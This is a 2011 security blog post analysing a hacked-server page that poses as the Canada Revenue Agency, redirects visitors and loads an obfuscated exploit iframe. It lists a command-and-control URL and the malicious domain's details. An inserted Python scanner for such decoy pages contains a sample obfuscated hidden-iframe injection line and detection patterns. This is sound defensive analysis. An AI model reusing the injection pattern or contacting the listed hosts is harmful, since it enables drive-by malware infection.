The Latest in IT Security

An ant-hill full of bots

15 Jun 2011

I found a malicious page placed on a hacked server:

CRA stands for Canada Revenue Agency, as you can see in the page’s source code below:

The meta tag redirects to the Canada Revenue Agency’s website after a few seconds:

But what is the rest of the obfuscated code?

Here is the deobfuscated version (courtesy of Wepawet):

Now we know more about the intent behind this cra.html page. The URL the iframe points to will load multiple exploits:
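As an added example (not code from the original post), here is a small triage scanner for the pattern just described: a meta refresh to a legitimate site paired with a script that unescapes and writes a hidden iframe. The sample page, the cra.example redirect target and the exploit.example iframe domain are constructed placeholders.

```python
# Triage scanner for decoy pages that pair a meta-refresh redirect with an
# obfuscated script that writes a hidden iframe (the cra.html pattern above).
# Added example; sample HTML and domains are constructed, not from the post.
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample: timed redirect to a placeholder site, plus a script that
# unescapes and writes a 1x1 iframe pointing at a placeholder exploit domain.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="5;url=https://cra.example/">
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexploit.example%2Fin.php%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E'))</script>
</head><body>Redirecting...</body></html>"""

OBFUSCATION_MARKERS = ("unescape(", "eval(", "document.write(", "fromCharCode(")
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?[01]\b", re.I)
IFRAME_SRC = re.compile(r"src\s*=\s*[\"']?([^\"'\s>]+)", re.I)

class DecoyPageParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (kind, detail) tuples
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta_refresh", a.get("content", "")))
        self._in_script = tag == "script"

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        if not self._in_script:
            return
        markers = [m for m in OBFUSCATION_MARKERS if m in data]
        if markers:
            self.findings.append(("obfuscated_script", ",".join(markers)))
        # Decode the percent-encoded literals the script would unescape at run
        # time and look for the hidden iframe the obfuscation conceals.
        for literal in re.findall(r"'([^']+)'", data):
            decoded = unquote(literal)
            if HIDDEN_IFRAME.search(decoded):
                src = IFRAME_SRC.search(decoded)
                self.findings.append(("decoded_hidden_iframe", src.group(1) if src else ""))

def scan_page(html):
    """Return (suspicious, findings); a timed redirect on its own is not flagged."""
    p = DecoyPageParser()
    p.feed(html)
    p.close()
    kinds = {k for k, _ in p.findings}
    return "meta_refresh" in kinds and len(kinds) > 1, p.findings
```

Running `scan_page(SAMPLE_HTML)` reports the redirect, the obfuscation markers and the decoded iframe target, while a page with only a meta refresh is left alone.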

I noticed that Google Chrome warned me prior to running the script (which I did anyway for testing purposes):

This is a pretty cool feature that can prevent many infections. Thanks Google :-)

Following a successful installation, the malware calls 212.150.164.206/email/gate.php at regular intervals and sends data in what looks like a custom obfuscated format:

Let’s check out the malicious domain: somerandomiframedomain.com

IP: 92.38.232.92
Location: Moscow, Russia
ASN: AS12695 (DINET-AS Digital Network JSC)
Registrar: BIZCN.COM, INC.

Registrant information is bogus (of course):
Ricardo GALENO @austin.co.com
9999999999 fax: 9999999999
1928 BURTON DR 157
Savannah TX 78741
us

Other domain names on that server include:

This ASN is deeply involved in allowing CnC servers and other bot-related activities:

abuse.ch:

Google Safe Browsing
malc0de.com

At this moment, I am not sure what the connection (if any) between the malware and the Canada Revenue Agency is.

Here are a couple of VirusTotal reports from some of the binaries that were dropped. VT1, VT2.

Jerome Segura
